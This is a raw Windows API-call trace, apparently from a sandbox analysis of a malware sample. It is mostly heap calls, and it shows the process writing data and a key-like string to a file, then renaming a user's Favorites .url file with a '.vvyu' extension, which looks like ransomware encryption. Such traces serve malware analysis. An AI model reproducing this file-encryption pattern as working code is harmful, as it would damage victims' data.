[0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a00 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d399e8 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.570] GetCurrentThreadId () returned 0x264 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43dc0 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.571] GetCurrentThreadId () returned 0x264 [0189.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a00 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a60 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a78 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a18 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399e8 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d392e8 | out: hHeap=0x6a0000) returned 1 [0189.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.582] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.582] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.582] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.584] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.584] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.584] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.584] CloseHandle (hObject=0x584) returned 1 [0189.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.586] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url.vvyu")) returned 1 [0189.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.588] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.591] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0189.591] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0189.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.592] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0189.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.592] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0189.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 